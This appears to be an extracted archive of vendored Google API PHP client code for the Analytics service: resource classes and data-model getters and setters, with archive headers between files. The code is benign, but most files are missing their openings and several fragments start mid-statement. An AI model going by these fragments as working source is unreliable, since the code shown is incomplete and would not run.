@opt_param string type * @return RemarketingAudiences */ public function listManagementRemarketingAudience($accountId, $webPropertyId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], RemarketingAudiences::class); } /** * Updates an existing remarketing audience. This method supports patch * semantics. (remarketingAudience.patch) * * @param string $accountId The account ID of the remarketing audience to * update. * @param string $webPropertyId The web property ID of the remarketing audience * to update. * @param string $remarketingAudienceId The ID of the remarketing audience to * update. * @param RemarketingAudience $postBody * @param array $optParams Optional parameters. * @return RemarketingAudience */ public function patch($accountId, $webPropertyId, $remarketingAudienceId, RemarketingAudience $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'remarketingAudienceId' => $remarketingAudienceId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], RemarketingAudience::class); } /** * Updates an existing remarketing audience. (remarketingAudience.update) * * @param string $accountId The account ID of the remarketing audience to * update. * @param string $webPropertyId The web property ID of the remarketing audience * to update. * @param string $remarketingAudienceId The ID of the remarketing audience to * update. * @param RemarketingAudience $postBody * @param array $optParams Optional parameters. * @return RemarketingAudience */ public function update($accountId, $webPropertyId, $remarketingAudienceId, RemarketingAudience $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'remarketingAudienceId' => $remarketingAudienceId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], RemarketingAudience::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementRemarketingAudience::class, 'Google_Service_Analytics_Resource_ManagementRemarketingAudience'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementAccountSummaries.php000064400000003711147600400120027422 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $accountSummaries = $analyticsService->management_accountSummaries; * */ class ManagementAccountSummaries extends \Google\Service\Resource { /** * Lists account summaries (lightweight tree comprised of * accounts/properties/profiles) to which the user has access. * (accountSummaries.listManagementAccountSummaries) * * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of account summaries to include * in this response, where the largest acceptable value is 1000. * @opt_param int start-index An index of the first entity to retrieve. Use this * parameter as a pagination mechanism along with the max-results parameter. * @return AccountSummaries */ public function listManagementAccountSummaries($optParams = []) { $params = []; $params = array_merge($params, $optParams); return $this->call('list', [$params], AccountSummaries::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementAccountSummaries::class, 'Google_Service_Analytics_Resource_ManagementAccountSummaries'); google-api/vendor/google/apiclient-services/src/Analytics/Resource/ManagementUploads.php000064400000011126147600400120025546 0ustar00 * $analyticsService = new Google\Service\Analytics(...); * $uploads = $analyticsService->management_uploads; * */ class ManagementUploads extends \Google\Service\Resource { /** * Delete data associated with a previous upload. (uploads.deleteUploadData) * * @param string $accountId Account Id for the uploads to be deleted. * @param string $webPropertyId Web property Id for the uploads to be deleted. * @param string $customDataSourceId Custom data source Id for the uploads to be * deleted. * @param AnalyticsDataimportDeleteUploadDataRequest $postBody * @param array $optParams Optional parameters. */ public function deleteUploadData($accountId, $webPropertyId, $customDataSourceId, AnalyticsDataimportDeleteUploadDataRequest $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customDataSourceId' => $customDataSourceId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('deleteUploadData', [$params]); } /** * List uploads to which the user has access. (uploads.get) * * @param string $accountId Account Id for the upload to retrieve. * @param string $webPropertyId Web property Id for the upload to retrieve. * @param string $customDataSourceId Custom data source Id for upload to * retrieve. * @param string $uploadId Upload Id to retrieve. * @param array $optParams Optional parameters. * @return Upload */ public function get($accountId, $webPropertyId, $customDataSourceId, $uploadId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customDataSourceId' => $customDataSourceId, 'uploadId' => $uploadId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], Upload::class); } /** * List uploads to which the user has access. (uploads.listManagementUploads) * * @param string $accountId Account Id for the uploads to retrieve. * @param string $webPropertyId Web property Id for the uploads to retrieve. * @param string $customDataSourceId Custom data source Id for uploads to * retrieve. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of uploads to include in this * response. * @opt_param int start-index A 1-based index of the first upload to retrieve. * Use this parameter as a pagination mechanism along with the max-results * parameter. * @return Uploads */ public function listManagementUploads($accountId, $webPropertyId, $customDataSourceId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customDataSourceId' => $customDataSourceId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], Uploads::class); } /** * Upload data for a custom data source. (uploads.uploadData) * * @param string $accountId Account Id associated with the upload. * @param string $webPropertyId Web property UA-string associated with the * upload. * @param string $customDataSourceId Custom data source Id to which the data * being uploaded belongs. * @param array $optParams Optional parameters. * @return Upload */ public function uploadData($accountId, $webPropertyId, $customDataSourceId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'customDataSourceId' => $customDataSourceId]; $params = array_merge($params, $optParams); return $this->call('uploadData', [$params], Upload::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementUploads::class, 'Google_Service_Analytics_Resource_ManagementUploads'); vendor/google/apiclient-services/src/Analytics/Resource/ManagementWebPropertyAdWordsLinks.php000064400000014455147600400120030637 0ustar00google-api * $analyticsService = new Google\Service\Analytics(...); * $webPropertyAdWordsLinks = $analyticsService->management_webPropertyAdWordsLinks; * */ class ManagementWebPropertyAdWordsLinks extends \Google\Service\Resource { /** * Deletes a web property-Google Ads link. (webPropertyAdWordsLinks.delete) * * @param string $accountId ID of the account which the given web property * belongs to. * @param string $webPropertyId Web property ID to delete the Google Ads link * for. * @param string $webPropertyAdWordsLinkId Web property Google Ads link ID. * @param array $optParams Optional parameters. */ public function delete($accountId, $webPropertyId, $webPropertyAdWordsLinkId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'webPropertyAdWordsLinkId' => $webPropertyAdWordsLinkId]; $params = array_merge($params, $optParams); return $this->call('delete', [$params]); } /** * Returns a web property-Google Ads link to which the user has access. * (webPropertyAdWordsLinks.get) * * @param string $accountId ID of the account which the given web property * belongs to. * @param string $webPropertyId Web property ID to retrieve the Google Ads link * for. * @param string $webPropertyAdWordsLinkId Web property-Google Ads link ID. * @param array $optParams Optional parameters. * @return EntityAdWordsLink */ public function get($accountId, $webPropertyId, $webPropertyAdWordsLinkId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'webPropertyAdWordsLinkId' => $webPropertyAdWordsLinkId]; $params = array_merge($params, $optParams); return $this->call('get', [$params], EntityAdWordsLink::class); } /** * Creates a webProperty-Google Ads link. (webPropertyAdWordsLinks.insert) * * @param string $accountId ID of the Google Analytics account to create the * link for. * @param string $webPropertyId Web property ID to create the link for. * @param EntityAdWordsLink $postBody * @param array $optParams Optional parameters. * @return EntityAdWordsLink */ public function insert($accountId, $webPropertyId, EntityAdWordsLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('insert', [$params], EntityAdWordsLink::class); } /** * Lists webProperty-Google Ads links for a given web property. * (webPropertyAdWordsLinks.listManagementWebPropertyAdWordsLinks) * * @param string $accountId ID of the account which the given web property * belongs to. * @param string $webPropertyId Web property ID to retrieve the Google Ads links * for. * @param array $optParams Optional parameters. * * @opt_param int max-results The maximum number of webProperty-Google Ads links * to include in this response. * @opt_param int start-index An index of the first webProperty-Google Ads link * to retrieve. Use this parameter as a pagination mechanism along with the max- * results parameter. * @return EntityAdWordsLinks */ public function listManagementWebPropertyAdWordsLinks($accountId, $webPropertyId, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId]; $params = array_merge($params, $optParams); return $this->call('list', [$params], EntityAdWordsLinks::class); } /** * Updates an existing webProperty-Google Ads link. This method supports patch * semantics. (webPropertyAdWordsLinks.patch) * * @param string $accountId ID of the account which the given web property * belongs to. * @param string $webPropertyId Web property ID to retrieve the Google Ads link * for. * @param string $webPropertyAdWordsLinkId Web property-Google Ads link ID. * @param EntityAdWordsLink $postBody * @param array $optParams Optional parameters. * @return EntityAdWordsLink */ public function patch($accountId, $webPropertyId, $webPropertyAdWordsLinkId, EntityAdWordsLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'webPropertyAdWordsLinkId' => $webPropertyAdWordsLinkId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('patch', [$params], EntityAdWordsLink::class); } /** * Updates an existing webProperty-Google Ads link. * (webPropertyAdWordsLinks.update) * * @param string $accountId ID of the account which the given web property * belongs to. * @param string $webPropertyId Web property ID to retrieve the Google Ads link * for. * @param string $webPropertyAdWordsLinkId Web property-Google Ads link ID. * @param EntityAdWordsLink $postBody * @param array $optParams Optional parameters. * @return EntityAdWordsLink */ public function update($accountId, $webPropertyId, $webPropertyAdWordsLinkId, EntityAdWordsLink $postBody, $optParams = []) { $params = ['accountId' => $accountId, 'webPropertyId' => $webPropertyId, 'webPropertyAdWordsLinkId' => $webPropertyAdWordsLinkId, 'postBody' => $postBody]; $params = array_merge($params, $optParams); return $this->call('update', [$params], EntityAdWordsLink::class); } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ManagementWebPropertyAdWordsLinks::class, 'Google_Service_Analytics_Resource_ManagementWebPropertyAdWordsLinks'); google-api/vendor/google/apiclient-services/src/Analytics/Webproperties.php000064400000006044147600400120023210 0ustar00items = $items; } /** * @return Webproperty[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Webproperties::class, 'Google_Service_Analytics_Webproperties'); google-api/vendor/google/apiclient-services/src/Analytics/AccountSummaries.php000064400000006071147600400120023640 0ustar00items = $items; } /** * @return AccountSummary[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AccountSummaries::class, 'Google_Service_Analytics_AccountSummaries'); google-api/vendor/google/apiclient-services/src/Analytics/ExperimentParentLink.php000064400000002463147600400120024467 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ExperimentParentLink::class, 'Google_Service_Analytics_ExperimentParentLink'); google-api/vendor/google/apiclient-services/src/Analytics/EntityUserLinkEntity.php000064400000004035147600400120024502 0ustar00accountRef = $accountRef; } /** * @return AccountRef */ public function getAccountRef() { return $this->accountRef; } /** * @param ProfileRef */ public function setProfileRef(ProfileRef $profileRef) { $this->profileRef = $profileRef; } /** * @return ProfileRef */ public function getProfileRef() { return $this->profileRef; } /** * @param WebPropertyRef */ public function setWebPropertyRef(WebPropertyRef $webPropertyRef) { $this->webPropertyRef = $webPropertyRef; } /** * @return WebPropertyRef */ public function getWebPropertyRef() { return $this->webPropertyRef; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(EntityUserLinkEntity::class, 'Google_Service_Analytics_EntityUserLinkEntity'); google-api/vendor/google/apiclient-services/src/Analytics/GaDataColumnHeaders.php000064400000003140147600400120024143 0ustar00columnType = $columnType; } /** * @return string */ public function getColumnType() { return $this->columnType; } /** * @param string */ public function setDataType($dataType) { $this->dataType = $dataType; } /** * @return string */ public function getDataType() { return $this->dataType; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GaDataColumnHeaders::class, 'Google_Service_Analytics_GaDataColumnHeaders'); google-api/vendor/google/apiclient-services/src/Analytics/GaDataDataTableRows.php000064400000002335147600400120024113 0ustar00c = $c; } /** * @return GaDataDataTableRowsC[] */ public function getC() { return $this->c; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(GaDataDataTableRows::class, 'Google_Service_Analytics_GaDataDataTableRows'); google-api/vendor/google/apiclient-services/src/Analytics/RealtimeDataProfileInfo.php000064400000005046147600400120025050 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setProfileId($profileId) { $this->profileId = $profileId; } /** * @return string */ public function getProfileId() { return $this->profileId; } /** * @param string */ public function setProfileName($profileName) { $this->profileName = $profileName; } /** * @return string */ public function getProfileName() { return $this->profileName; } /** * @param string */ public function setTableId($tableId) { $this->tableId = $tableId; } /** * @return string */ public function getTableId() { return $this->tableId; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RealtimeDataProfileInfo::class, 'Google_Service_Analytics_RealtimeDataProfileInfo'); google-api/vendor/google/apiclient-services/src/Analytics/AccountChildLink.php000064400000002447147600400120023537 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AccountChildLink::class, 'Google_Service_Analytics_AccountChildLink'); google-api/vendor/google/apiclient-services/src/Analytics/ProfileSummary.php000064400000003740147600400120023334 0ustar00id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param bool */ public function setStarred($starred) { $this->starred = $starred; } /** * @return bool */ public function getStarred() { return $this->starred; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProfileSummary::class, 'Google_Service_Analytics_ProfileSummary'); google-api/vendor/google/apiclient-services/src/Analytics/CustomMetricParentLink.php000064400000002471147600400120024764 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomMetricParentLink::class, 'Google_Service_Analytics_CustomMetricParentLink'); vendor/google/apiclient-services/src/Analytics/UnsampledReportCloudStorageDownloadDetails.php000064400000002655147600400120030741 0ustar00google-apibucketId = $bucketId; } /** * @return string */ public function getBucketId() { return $this->bucketId; } /** * @param string */ public function setObjectId($objectId) { $this->objectId = $objectId; } /** * @return string */ public function getObjectId() { return $this->objectId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UnsampledReportCloudStorageDownloadDetails::class, 'Google_Service_Analytics_UnsampledReportCloudStorageDownloadDetails'); google-api/vendor/google/apiclient-services/src/Analytics/UnsampledReportDriveDownloadDetails.php000064400000002240147600400120027464 0ustar00documentId = $documentId; } /** * @return string */ public function getDocumentId() { return $this->documentId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UnsampledReportDriveDownloadDetails::class, 'Google_Service_Analytics_UnsampledReportDriveDownloadDetails'); google-api/vendor/google/apiclient-services/src/Analytics/FilterLowercaseDetails.php000064400000002541147600400120024754 0ustar00field = $field; } /** * @return string */ public function getField() { return $this->field; } /** * @param int */ public function setFieldIndex($fieldIndex) { $this->fieldIndex = $fieldIndex; } /** * @return int */ public function getFieldIndex() { return $this->fieldIndex; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(FilterLowercaseDetails::class, 'Google_Service_Analytics_FilterLowercaseDetails'); google-api/vendor/google/apiclient-services/src/Analytics/RemarketingAudiences.php000064400000006131147600400120024444 0ustar00items = $items; } /** * @return RemarketingAudience[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RemarketingAudiences::class, 'Google_Service_Analytics_RemarketingAudiences'); google-api/vendor/google/apiclient-services/src/Analytics/ProfileChildLink.php000064400000002447147600400120023543 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProfileChildLink::class, 'Google_Service_Analytics_ProfileChildLink'); google-api/vendor/google/apiclient-services/src/Analytics/RemarketingAudienceAudienceDefinition.php000064400000002566147600400120027740 0ustar00includeConditions = $includeConditions; } /** * @return IncludeConditions */ public function getIncludeConditions() { return $this->includeConditions; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RemarketingAudienceAudienceDefinition::class, 'Google_Service_Analytics_RemarketingAudienceAudienceDefinition'); google-api/vendor/google/apiclient-services/src/Analytics/Segments.php000064400000006005147600400120022140 0ustar00items = $items; } /** * @return Segment[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Segments::class, 'Google_Service_Analytics_Segments'); google-api/vendor/google/apiclient-services/src/Analytics/HashClientIdResponse.php000064400000003650147600400120024374 0ustar00clientId = $clientId; } /** * @return string */ public function getClientId() { return $this->clientId; } /** * @param string */ public function setHashedClientId($hashedClientId) { $this->hashedClientId = $hashedClientId; } /** * @return string */ public function getHashedClientId() { return $this->hashedClientId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setWebPropertyId($webPropertyId) { $this->webPropertyId = $webPropertyId; } /** * @return string */ public function getWebPropertyId() { return $this->webPropertyId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(HashClientIdResponse::class, 'Google_Service_Analytics_HashClientIdResponse'); google-api/vendor/google/apiclient-services/src/Analytics/EntityUserLinkPermissions.php000064400000002644147600400120025545 0ustar00effective = $effective; } /** * @return string[] */ public function getEffective() { return $this->effective; } /** * @param string[] */ public function setLocal($local) { $this->local = $local; } /** * @return string[] */ public function getLocal() { return $this->local; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(EntityUserLinkPermissions::class, 'Google_Service_Analytics_EntityUserLinkPermissions'); google-api/vendor/google/apiclient-services/src/Analytics/AccountTreeResponse.php000064400000004206147600400120024307 0ustar00account = $account; } /** * @return Account */ public function getAccount() { return $this->account; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param Profile */ public function setProfile(Profile $profile) { $this->profile = $profile; } /** * @return Profile */ public function getProfile() { return $this->profile; } /** * @param Webproperty */ public function setWebproperty(Webproperty $webproperty) { $this->webproperty = $webproperty; } /** * @return Webproperty */ public function getWebproperty() { return $this->webproperty; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(AccountTreeResponse::class, 'Google_Service_Analytics_AccountTreeResponse'); google-api/vendor/google/apiclient-services/src/Analytics/RealtimeDataQuery.php000064400000004713147600400120023741 0ustar00 "max-results", ]; /** * @var string */ public $dimensions; /** * @var string */ public $filters; /** * @var string */ public $ids; /** * @var int */ public $maxResults; /** * @var string[] */ public $metrics; /** * @var string[] */ public $sort; /** * @param string */ public function setDimensions($dimensions) { $this->dimensions = $dimensions; } /** * @return string */ public function getDimensions() { return $this->dimensions; } /** * @param string */ public function setFilters($filters) { $this->filters = $filters; } /** * @return string */ public function getFilters() { return $this->filters; } /** * @param string */ public function setIds($ids) { $this->ids = $ids; } /** * @return string */ public function getIds() { return $this->ids; } /** * @param int */ public function setMaxResults($maxResults) { $this->maxResults = $maxResults; } /** * @return int */ public function getMaxResults() { return $this->maxResults; } /** * @param string[] */ public function setMetrics($metrics) { $this->metrics = $metrics; } /** * @return string[] */ public function getMetrics() { return $this->metrics; } /** * @param string[] */ public function setSort($sort) { $this->sort = $sort; } /** * @return string[] */ public function getSort() { return $this->sort; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RealtimeDataQuery::class, 'Google_Service_Analytics_RealtimeDataQuery'); google-api/vendor/google/apiclient-services/src/Analytics/ProfileParentLink.php000064400000002452147600400120023745 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(ProfileParentLink::class, 'Google_Service_Analytics_ProfileParentLink'); google-api/vendor/google/apiclient-services/src/Analytics/Profiles.php000064400000006005147600400120022136 0ustar00items = $items; } /** * @return Profile[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(Profiles::class, 'Google_Service_Analytics_Profiles'); google-api/vendor/google/apiclient-services/src/Analytics/EntityAdWordsLinkEntity.php000064400000002442147600400120025127 0ustar00webPropertyRef = $webPropertyRef; } /** * @return WebPropertyRef */ public function getWebPropertyRef() { return $this->webPropertyRef; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(EntityAdWordsLinkEntity::class, 'Google_Service_Analytics_EntityAdWordsLinkEntity'); src/Analytics/RemarketingAudienceStateBasedAudienceDefinitionExcludeConditions.php000064400000003047147600400120035160 0ustar00google-api/vendor/google/apiclient-servicesexclusionDuration = $exclusionDuration; } /** * @return string */ public function getExclusionDuration() { return $this->exclusionDuration; } /** * @param string */ public function setSegment($segment) { $this->segment = $segment; } /** * @return string */ public function getSegment() { return $this->segment; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RemarketingAudienceStateBasedAudienceDefinitionExcludeConditions::class, 'Google_Service_Analytics_RemarketingAudienceStateBasedAudienceDefinitionExcludeConditions'); google-api/vendor/google/apiclient-services/src/Analytics/UserDeletionRequestId.php000064400000002504147600400120024603 0ustar00type = $type; } /** * @return string */ public function getType() { return $this->type; } /** * @param string */ public function setUserId($userId) { $this->userId = $userId; } /** * @return string */ public function getUserId() { return $this->userId; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(UserDeletionRequestId::class, 'Google_Service_Analytics_UserDeletionRequestId'); google-api/vendor/google/apiclient-services/src/Analytics/WebpropertyChildLink.php000064400000002463147600400120024463 0ustar00href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(WebpropertyChildLink::class, 'Google_Service_Analytics_WebpropertyChildLink'); google-api/vendor/google/apiclient-services/src/Analytics/WebPropertyRef.php000064400000004525147600400120023277 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param string */ public function setHref($href) { $this->href = $href; } /** * @return string */ public function getHref() { return $this->href; } /** * @param string */ public function setId($id) { $this->id = $id; } /** * @return string */ public function getId() { return $this->id; } /** * @param string */ public function setInternalWebPropertyId($internalWebPropertyId) { $this->internalWebPropertyId = $internalWebPropertyId; } /** * @return string */ public function getInternalWebPropertyId() { return $this->internalWebPropertyId; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(WebPropertyRef::class, 'Google_Service_Analytics_WebPropertyRef'); google-api/vendor/google/apiclient-services/src/Analytics/RealtimeDataColumnHeaders.php000064400000003162147600400120025362 0ustar00columnType = $columnType; } /** * @return string */ public function getColumnType() { return $this->columnType; } /** * @param string */ public function setDataType($dataType) { $this->dataType = $dataType; } /** * @return string */ public function getDataType() { return $this->dataType; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(RealtimeDataColumnHeaders::class, 'Google_Service_Analytics_RealtimeDataColumnHeaders'); google-api/vendor/google/apiclient-services/src/Analytics/CustomDimensions.php000064400000006075147600400120023665 0ustar00items = $items; } /** * @return CustomDimension[] */ public function getItems() { return $this->items; } /** * @param int */ public function setItemsPerPage($itemsPerPage) { $this->itemsPerPage = $itemsPerPage; } /** * @return int */ public function getItemsPerPage() { return $this->itemsPerPage; } /** * @param string */ public function setKind($kind) { $this->kind = $kind; } /** * @return string */ public function getKind() { return $this->kind; } /** * @param string */ public function setNextLink($nextLink) { $this->nextLink = $nextLink; } /** * @return string */ public function getNextLink() { return $this->nextLink; } /** * @param string */ public function setPreviousLink($previousLink) { $this->previousLink = $previousLink; } /** * @return string */ public function getPreviousLink() { return $this->previousLink; } /** * @param int */ public function setStartIndex($startIndex) { $this->startIndex = $startIndex; } /** * @return int */ public function getStartIndex() { return $this->startIndex; } /** * @param int */ public function setTotalResults($totalResults) { $this->totalResults = $totalResults; } /** * @return int */ public function getTotalResults() { return $this->totalResults; } /** * @param string */ public function setUsername($username) { $this->username = $username; } /** * @return string */ public function getUsername() { return $this->username; } } // Adding a class alias for backwards compatibility with the previous class name. class_alias(CustomDimensions::class, 'Google_Service_Analytics_CustomDimensions'); google-api/vendor/google/apiclient-services/src/Analytics/Profile.php000064400000021523147600400120021755 0ustar00accountId = $accountId; } /** * @return string */ public function getAccountId() { return $this->accountId; } /** * @param bool */ public function 